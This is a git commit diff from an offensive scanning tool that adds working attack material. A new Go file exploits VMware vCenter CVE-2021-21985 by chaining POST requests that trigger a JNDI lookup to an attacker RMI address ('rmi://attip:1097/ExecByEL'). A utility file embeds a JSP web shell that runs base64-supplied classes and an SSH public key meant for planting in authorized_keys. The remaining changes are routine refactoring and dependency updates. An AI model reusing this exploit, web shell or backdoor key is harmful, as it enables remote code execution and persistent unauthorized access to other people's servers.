add vCenter/CVE_2021_21985.go

vCenter/c_21972.go
vCenter/c_21985.go
vCenter/c_22005.go 2022-10-06

Author: hktalent

engine/dispather.go

@@ -12,6 +12,7 @@ import (
 )
 
 // passive 被动模式
+// https://github.com/projectdiscovery/tlsx
 var (
 	CaseScanFunc = map[int]util.EngineFuncType{
 		ScanType_SSLInfo:         nil,                        // 01- SSL信息分析，并对域名信息进行收集、进入下一步流程

go.mod

@@ -101,7 +101,7 @@ require (
 	github.com/google/go-github v17.0.0+incompatible
 	github.com/gorilla/websocket v1.5.0
 	github.com/gosnmp/gosnmp v1.35.0
-	github.com/hktalent/PipelineHttp v0.0.0-20221005112256-2ebdd38b820b
+	github.com/hktalent/PipelineHttp v0.0.0-20221005170636-4c4c7c3108ea
 	github.com/hktalent/goSqlite_gorm v1.1.1
 	github.com/hktalent/jarm-go v0.0.0-20220918133110-7801447b6267
 	github.com/huin/asn1ber v0.0.0-20120622192748-af09f62e6358

go.sum

@@ -514,6 +514,10 @@ github.com/hktalent/PipelineHttp v0.0.0-20221004080931-279351b9fb96 h1:8++Z/n334
 github.com/hktalent/PipelineHttp v0.0.0-20221004080931-279351b9fb96/go.mod h1:ob6ATP4M9FiqTRzyALSDox3kc6+xnTgzKuIT+rmKyeE=
 github.com/hktalent/PipelineHttp v0.0.0-20221005112256-2ebdd38b820b h1:S+mVjk0jfAnzT5ypZ65iQq4jjvStt0ggkfnhHoidliY=
 github.com/hktalent/PipelineHttp v0.0.0-20221005112256-2ebdd38b820b/go.mod h1:ncw1+ugTc5GPQLUHHI7uWrgW2KWBppDBWwwjC984QJg=
+github.com/hktalent/PipelineHttp v0.0.0-20221005141854-655e41c6acad h1:NFVuThP+NaYXkd8fRXd3DNt02ZiTr2OdBDIF/M1ZmWE=
+github.com/hktalent/PipelineHttp v0.0.0-20221005141854-655e41c6acad/go.mod h1:ncw1+ugTc5GPQLUHHI7uWrgW2KWBppDBWwwjC984QJg=
+github.com/hktalent/PipelineHttp v0.0.0-20221005170636-4c4c7c3108ea h1:riOxhSWDEbwbNFgCxBUkOsTYhZte/I+6Khf9Pab7uxU=
+github.com/hktalent/PipelineHttp v0.0.0-20221005170636-4c4c7c3108ea/go.mod h1:ncw1+ugTc5GPQLUHHI7uWrgW2KWBppDBWwwjC984QJg=
 github.com/hktalent/go-utils v0.0.0-20221004021941-7e10e0fb13ea h1:vuxZbB9vAwBi0Uj4F5GOfVtsi5E9MFX07EkCKypVu9M=
 github.com/hktalent/go-utils v0.0.0-20221004021941-7e10e0fb13ea/go.mod h1:9E0C0K+/zzyJ+VqFx1llC3y7+mGgW3toLoyMQnlNXhw=
 github.com/hktalent/go-utils v0.0.0-20221004095234-2e23f13b429d h1:z1IUP4hqn0LGgs78bU2gSlna92/p+RlB0MSZ+RxSmCo=

lib/util/strTools.go

@@ -0,0 +1,47 @@
+package util
+
+import (
+	"encoding/base64"
+	"math/rand"
+	"net/url"
+	"strings"
+	"time"
+)
+
+var (
+	WebShellName    = "x3.jsp"
+	X3Webshell      = `<%@page import="javax.xml.bind.*,java.lang.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte[] b){return super.defineClass(b, 0, b.length);}}%><% String c = (String)request.getParameter("c");if(null==c&&null!=session)c=(String)session.getAttribute("c");if (null == c && null != application.getAttribute("_c_"))c=(String)application.getAttribute("_c_");if (null != c)try {application.setAttribute("_c_",c);new U(this.getClass().getClassLoader()).g(DatatypeConverter.parseBase64Binary(c)).newInstance().equals(pageContext);} catch (Exception e) {}%>`
+	Authorized_keys = `ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsK7OsENqLwuH6pTrCBiNWNI0ByZZURaV+TS6l2P6cxWZpRAgVruyDk+XQ5pY9xJHTZfF75IT+ekWXA5hBe2eO8j+fAQuKaHgvlV8fTp48wMS0LRilfrslOsyv8DsrDs2ZSaiaraj7BwEBalaumczqBM0UoelCa7OvWJDqfyYK8ihQBYBXui/jvyb3FdRA9muOLFuo+AmhIyL3UMQ1jhUxrpmhAKxs6oUjMFXBj//TpvYL7AZXz+2MfmApHYSBx7vs+NodAOf9WShSPoHkuzz3riIsN3hBx66gGRGOPL00lvPsu/GS31klFKaGm3qFcHvO3uczRsaUGj89d/jUwBNh root@linuxkit-025000000001`
+)
+
+func To_b64(file_byte []byte) string {
+	return base64.StdEncoding.EncodeToString(file_byte)
+}
+
+func GetUrlHost(szUrl string) string {
+	if oU, err := url.Parse(szUrl); nil == err {
+		szUrl = oU.Scheme + "://" + oU.Host
+	}
+	return szUrl
+}
+
+// 生成随机id
+func GeneratorId(add_time int64) string {
+	var list_str = []string{}
+	size := 6
+	chars := "abcdefghijklmnopqrstuvwxyz"
+	dights := "0123456789"
+	strs := chars + dights
+	zz := time.Now().Unix() + add_time
+	rand.Seed(zz)
+
+	a := int64(len(strs))
+	for i := 0; i < size; i++ {
+		flag := rand.Int63n(a)
+		_ = flag
+		list_str = append(list_str, string(strs[int(flag)]))
+	}
+	// res := strings.Join(s, "")
+	res := strings.Join(list_str, "")
+	return res
+}

lib/util/sv2es.go

@@ -1,12 +1,10 @@
 package util
 
 import (
-	"bytes"
 	"crypto/sha1"
 	"encoding/hex"
 	"encoding/json"
 	"fmt"
-	"github.com/hktalent/PipelineHttp"
 	"io/ioutil"
 	"log"
 	"net/http"
@@ -77,23 +75,24 @@ func SendAData[T any](k string, data []T, szType ESaveType) {
 	}
 }
 
-var pphLog = PipelineHttp.NewPipelineHttp()
-
 // 发送数据到ES
 func SendReq(data1 interface{}, id string, szType ESaveType) {
 	DoSyncFunc(func() {
 		if !enableEsSv {
 			return
 		}
 		//log.Println("enableEsSv = ", enableEsSv, " id= ", id, " type = ", szType)
-		data, _ := json.Marshal(data1)
 		nThreads <- struct{}{}
 		defer func() {
 			<-nThreads
 		}()
 		szUrl := fmt.Sprintf(EsUrl, szType, url.QueryEscape(id))
 		log.Println("logs EsUrl = ", EsUrl)
-		pphLog.DoGetWithClient4SetHd(nil, szUrl, "POST", bytes.NewReader(data), func(resp *http.Response, err error, szU string) {
+		m1 := map[string]string{
+			"User-Agent":   "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15",
+			"Content-Type": "application/json;charset=UTF-8",
+		}
+		SendData2Url(szUrl, data1, &m1, func(resp *http.Response, err error, szU string) {
 			if nil != err {
 				log.Println("pphLog.DoGetWithClient4SetHd ", err)
 			} else {
@@ -104,12 +103,6 @@ func SendReq(data1 interface{}, id string, szType ESaveType) {
 					Log(err)
 				}
 			}
-		}, func() map[string]string {
-			m1 := map[string]string{
-				"User-Agent":   "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15",
-				"Content-Type": "application/json;charset=UTF-8",
-			}
-			return m1
-		}, true)
+		})
 	})
 }

lib/util/sv2es_test.go

@@ -7,7 +7,7 @@ import (
 func TestSendReq(t *testing.T) {
 	DoInit(nil)
 	t.Run("sv2es", func(t *testing.T) {
-		SendReq("test", "nmap", Nmap)
+		SendReq(`{"xx":"sdfsf"}`, "xx01nmap", Nmap)
 	})
 	Wg.Wait()
 	CloseAll()

lib/util/util.go

@@ -2,7 +2,9 @@ package util
 
 import (
 	"bufio"
+	"bytes"
 	"encoding/base64"
+	"encoding/json"
 	"errors"
 	"fmt"
 	"github.com/codegangsta/inject"
@@ -97,6 +99,7 @@ func GetClient(szUrl string) *PipelineHttp.PipelineHttp {
 
 	client = PipelineHttp.NewPipelineHttp()
 	mUrls[oU.Host] = ""
+	clientHttpCc.Delete(oU.Host)
 	clientHttpCc.Set(oU.Host, client, defaultInteractionDuration)
 	return client
 }
@@ -382,3 +385,13 @@ func ScannerToReader(scanner *bufio.Scanner) io.Reader {
 
 	return reader
 }
+
+// 纯粹发送数据到目标机器
+func SendData2Url(szUrl string, data1 interface{}, m1 *map[string]string, fnCbk func(resp *http.Response, err error, szU string)) {
+	data, _ := json.Marshal(data1)
+	log.Println("logs EsUrl = ", EsUrl)
+	c1 := GetClient(szUrl)
+	c1.DoGetWithClient4SetHd(c1.Client, szUrl, "POST", bytes.NewReader(data), fnCbk, func() map[string]string {
+		return *m1
+	}, true)
+}

pocs_go/VMware/vCenter/CVE_2021_21985.go

@@ -0,0 +1,39 @@
+package vCenter
+
+import (
+	"fmt"
+	"github.com/hktalent/scan4all/lib/util"
+	"io"
+	"net/http"
+	"net/url"
+)
+
+/*
+https://github.com/welk1n/JNDI-Injection-Bypass/
+*/
+func Check_CVE_2021_21985(szUrl string) bool {
+	szPayload := "rmi://attip:1097/ExecByEL"
+	aP := []string{
+		`{"methodInput":[null]}`,
+		`{"methodInput":["javax.naming.InitialContext.doLookup"]}`,
+		`{"methodInput":["doLookup"]}`,
+		fmt.Sprintf(`methodInput":[["%s"]]}`, szPayload),
+		`{"methodInput":[]}`,
+		`{"methodInput":[]}`,
+	}
+	if oU, err := url.Parse(szUrl); nil == err {
+		s1 := oU.Scheme + "://" + oU.Hostname() + "/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService"
+		uris := []string{"/setTargetObject", "/setStaticMethod", "/setTargetMethod", "/setArguments", "/prepare", "/invoke"}
+		headers := map[string]string{"Content-Type": "application/json"}
+		for i, x := range uris {
+			util.SendData2Url(s1+x, aP[i], &headers, func(resp *http.Response, err error, szU string) {
+				if nil != resp {
+					io.Copy(io.Discard, resp.Body)
+				}
+			})
+		}
+		// 延时几秒 检测 rmi 回显示，如果目标不能出网，可以尝试打 SSRF
+
+	}
+	return false
+}